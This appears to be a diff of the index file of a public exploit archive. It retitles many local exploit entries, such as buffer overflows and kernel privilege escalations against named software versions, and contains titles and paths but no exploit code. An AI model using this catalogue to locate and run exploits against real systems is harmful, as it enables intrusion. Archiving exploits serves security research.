 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0
@@ -6585,7 +6585,7 @@ id,file,description,date,author,platform,type,port
 10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",multiple,local,0
 10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local,0
 10078,platforms/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local Exploit (PoC)",2009-10-02,mu-b,osx,local,0
-33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (Unicode SEH)",2014-05-19,"Mike Czumak",windows,local,0
+33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)",2014-05-19,"Mike Czumak",windows,local,0
 10084,platforms/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Privilege Escalation",2009-10-13,"Maxim A. Kulakov",windows,local,0
 10201,platforms/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0
 10207,platforms/multiple/local/10207.txt,"VMware Virtual 8086 - Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0
@@ -6655,12 +6655,12 @@ id,file,description,date,author,platform,type,port
 10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,windows,local,0
 10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0
 10787,platforms/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0
-10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow",2009-12-30,mr_me,windows,local,0
-10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - (SEH) Exploit",2009-12-30,"Sébastien Duquette",windows,local,0
+10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,windows,local,0
+10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Exploit (SEH)",2009-12-30,"Sébastien Duquette",windows,local,0
 10936,platforms/windows/local/10936.c,"PlayMeNow (Windows XP SP2 French) - '.M3U' Playlist Buffer Overflow",2010-01-03,bibi-info,windows,local,0
 11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3/7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0
 11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,multiple,local,0
-11046,platforms/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (Bindshell)",2010-01-06,sinn3r,windows,local,0
+11046,platforms/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (2)",2010-01-06,sinn3r,windows,local,0
 11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0
 11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow (SEH) (Metasploit)",2010-01-10,fb1h2s,windows,local,0
 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow 
(Metasploit)",2010-01-11,dookie,windows,local,0
@@ -6683,7 +6683,7 @@ id,file,description,date,author,platform,type,port
 11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
 11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0
 11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0
-11267,platforms/windows/local/11267.py,"Winamp 5.572 - (SEH) Exploit",2010-01-26,TecR0c,windows,local,0
+11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit (SEH)",2010-01-26,TecR0c,windows,local,0
 11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0
 11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (Password field) Universal Buffer Overflow",2010-02-02,mr_me,windows,local,0
 11315,platforms/windows/local/11315.c,"DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",windows,local,0
@@ -6733,7 +6733,7 @@ id,file,description,date,author,platform,type,port
 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0
 12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav' Exploit",2010-04-02,"Richard leahy",windows,local,0
 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0
-12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - (SEH) Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0
+12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - Exploit (SEH)",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0
 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0
 12053,platforms/windows/local/12053.py,"ZipCentral - '.zip' File (SEH)",2010-04-04,TecR0c,windows,local,0
 12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' File (SEH)",2010-04-04,"Lincoln and corelanc0d3r",windows,local,0
@@ -6744,7 +6744,7 @@ id,file,description,date,author,platform,type,port
 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
 12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0
 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
-12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' (SEH) (Metasploit)",2010-04-16,blake,windows,local,0
+12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' Exploit (SEH) (Metasploit)",2010-04-16,blake,windows,local,0
 12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0
 12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
 12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0
@@ -6767,14 +6767,14 @@ id,file,description,date,author,platform,type,port
 12677,platforms/windows/local/12677.html,"Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - 'OpenSession()' Buffer Overflow",2010-05-21,sinn3r,windows,local,0
 12710,platforms/windows/local/12710.c,"Kingsoft Webshield 'KAVSafe.sys' 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0
 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function 'Initialize()' Buffer Overflow",2010-05-30,sinn3r,windows,local,0
-12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - (SEH) Exploit",2010-05-31,Stoke,windows,local,0
+12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - Exploit (SEH)",2010-05-31,Stoke,windows,local,0
 40335,platforms/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,windows,local,0
 15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow (SEH)",2010-11-12,Dr_IDE,windows,local,0
 13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (1)",2010-06-07,mr_me,windows,local,0
 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow (PoC)",2010-06-07,sud0,windows,local,0
 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Buffer Overflow (SEH)",2010-06-07,chap0,windows,local,0
 13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local,0
-13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0
+13767,platforms/windows/local/13767.c,"SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0
 13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,php,local,0
 13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0
 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0
@@ -6783,8 +6783,8 @@ id,file,description,date,author,platform,type,port
 13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP + SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0
 13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0
 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0
-13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0
-13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File (SEH) Universal Buffer Overflow",2010-06-23,Madjix,windows,local,0
+13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,windows,local,0
+13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)",2010-06-23,Madjix,windows,local,0
 14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0
 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0
 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0
@@ -6800,7 +6800,7 @@ id,file,description,date,author,platform,type,port
 14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0
 14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit (Direct RET)",2010-07-07,chap0,windows,local,0
 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0
-14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - (SEH) Multiple OS ASLR + DEP Bypass (Metasploit)",2010-07-13,Node,windows,local,0
+14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)",2010-07-13,Node,windows,local,0
 14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0
 14373,platforms/win_x86/local/14373.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow Universal",2010-07-16,Madjix,win_x86,local,0
 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
@@ -6897,20 +6897,20 @@ id,file,description,date,author,platform,type,port
 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0
 14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - Overflow (SEH)",2010-09-09,"Abhishek Lyall",win_x86,local,0
 14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0
-15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - (SEH) Exploit",2010-09-15,"sanjeev gupta",windows,local,0
+15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - Exploit (SEH)",2010-09-15,"sanjeev gupta",windows,local,0
 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
 15023,platforms/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",lin_x86-64,local,0
 15024,platforms/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,lin_x86-64,local,0
 15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0
-15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - (SEH) Exploit",2010-09-17,"Abhishek Lyall",windows,local,0
+15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - Exploit (SEH)",2010-09-17,"Abhishek Lyall",windows,local,0
 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)",2010-09-17,modpr0be,windows,local,0
 15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 - Overflow (SEH) (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0
 15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH)",2010-09-24,"James 
Fitts",windows,local,0
 15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0
 15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Privilege Escalation",2010-09-21,fuzz,linux,local,0
-15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - (SEH) (Metasploit)",2010-09-22,Madjix,windows,local,0
+15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - Exploit (SEH) (Metasploit)",2010-09-22,Madjix,windows,local,0
 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0
-15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - (SEH) Exploit",2010-09-27,"sanjeev gupta",windows,local,0
+15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - Exploit (SEH)",2010-09-27,"sanjeev gupta",windows,local,0
 15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - Overflow (SEH) (Metasploit)",2010-09-27,"Abhishek Lyall",windows,local,0
 15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)",2010-09-29,"Jon Oberheide",linux,local,0
 15155,platforms/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0
@@ -6957,7 +6957,7 @@ id,file,description,date,author,platform,type,port
 15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0
 15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0
 15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
-15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0
+15706,platforms/windows/local/15706.txt,"Winamp 5.6 - 'MIDI Parser' Arbitrary Code Execution",2010-12-08,"Kryptos Logic",windows,local,0
 15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local,0
 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Buffer Overflow",2010-12-11,zota,windows,local,0
 15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow",2010-12-12,m_101,windows,local,0
@@ -6977,14 +6977,14 @@ id,file,description,date,author,platform,type,port
 15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0
 15916,platforms/lin_x86/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",lin_x86,local,0
 15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow",2011-01-06,"C4SS!0 G0M3S",windows,local,0
-15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0
+15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (SEH Unicode)",2011-01-07,"C4SS!0 G0M3S",windows,local,0
 15936,platforms/windows/local/15936.py,"VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local,0
 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow (SEH)",2011-01-08,fdiskyou,windows,local,0
 15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Privilege Escalation (2)",2011-01-08,"Joe Sylve",linux,local,0
 15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Privilege Escalation",2011-01-10,peri.carding,solaris,local,0
 15972,platforms/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0
 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow",2011-03-02,"C4SS!0 G0M3S",windows,local,0
-15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0
+15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - Exploit (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0
 15985,platforms/windows/local/15985.c,"Microsoft Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben 
Santamarta",windows,local,0
 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0
 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0
@@ -7094,7 +7094,7 @@ id,file,description,date,author,platform,type,port
 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow",2011-03-14,h1ch4m,windows,local,0
 16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write (Metasploit)",2011-03-14,Metasploit,windows,local,0
 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
-16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - (SEH) Exploit",2011-03-18,"Anastasios Monachos",windows,local,0
+16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - Exploit (SEH)",2011-03-18,"Anastasios Monachos",windows,local,0
 17001,platforms/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Buffer Overflow",2011-03-18,Rh0,windows,local,0
 17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local,0
 17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Overflow (SEH)",2011-03-20,"C4SS!0 and h1ch4m",windows,local,0
@@ -7149,7 +7149,7 @@ id,file,description,date,author,platform,type,port
 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0
 40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0
 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0
-17563,platforms/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0
+17563,platforms/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (SEH Unicode)",2011-07-23,"C4SS!0 G0M3S",windows,local,0
 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - '.m3u' Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0
 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0
 17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0
@@ -7222,12 +7222,12 @@ id,file,description,date,author,platform,type,port
 18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)",2012-01-08,"b33f & g11tch",windows,local,0
 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0
 18372,platforms/windows/local/18372.txt,"Microsoft Windows - Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0
-18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0
+18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (SEH Unicode) (Metasploit)",2012-01-17,Metasploit,windows,local,0
 18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption (Metasploit)",2012-01-14,Metasploit,windows,local,0
 18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0
 18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - '.xml' File Buffer Overflow /SafeSEH Evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0
 18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow",2012-02-20,b33f,windows,local,0
-18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0
+18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - Exploit (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0
 18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,windows,local,0
 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer 
Overflow",2012-02-27,Vulnerability-Lab,windows,local,0
@@ -7676,7 +7676,7 @@ id,file,description,date,author,platform,type,port
 20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Exploit",1997-07-21,"D. J. Bernstein",unix,local,0
 20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0
 20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0
-20341,platforms/linux/local/20341.sh,"Samba 2.0.7 SWAT - Logfile Permissions",2000-11-01,miah,linux,local,0
+20341,platforms/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,linux,local,0
 20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - top Format String",2000-11-01,truefinder,freebsd,local,0
 20378,platforms/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local,0
 20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0
@@ -8314,7 +8314,7 @@ id,file,description,date,author,platform,type,port
 26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,windows,local,0
 26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution",2002-12-31,"Georgi Guninski",linux,local,0
 26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",linux,local,0
-26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - (SEH) Overflow",2013-07-01,"Jacob Holcomb",windows,local,0
+26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - Overflow (SEH)",2013-07-01,"Jacob Holcomb",windows,local,0
 26523,platforms/windows/local/26523.rb,"AudioCoder (.lst) - Buffer Overflow (Metasploit)",2013-07-01,Asesino04,windows,local,0
 26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' Buffer Overflow (SEH)",2013-07-01,MrXors,windows,local,0
 26554,platforms/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Privilege Escalation (Metasploit)",2013-07-02,Metasploit,windows,local,0
@@ -8412,7 +8412,7 @@ id,file,description,date,author,platform,type,port
 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass Exploit",2007-01-26,"Maksymilian Arciemowicz",php,local,0
 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
-29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (Unicode SEH)",2013-11-12,"Mike Czumak",windows,local,0
+29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)",2013-11-12,"Mike Czumak",windows,local,0
 29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0
 29603,platforms/windows/local/29603.txt,"Comodo Firewall 2.3/2.4 - Flawed Component Control Cryptographic Hash",2007-02-15,"Matousec Transparent security",windows,local,0
 29630,platforms/windows/local/29630.c,"Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0
@@ -8422,9 +8422,9 @@ id,file,description,date,author,platform,type,port
 29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - 'Sys_Tee' Privilege Escalation",2007-03-05,"Michael Kerrisk",linux,local,0
 29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0
 29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local,0
-29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH) 'UNICODE'",2013-11-22,"Mike Czumak",windows,local,0
+29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH Unicode)",2013-11-22,"Mike Czumak",windows,local,0
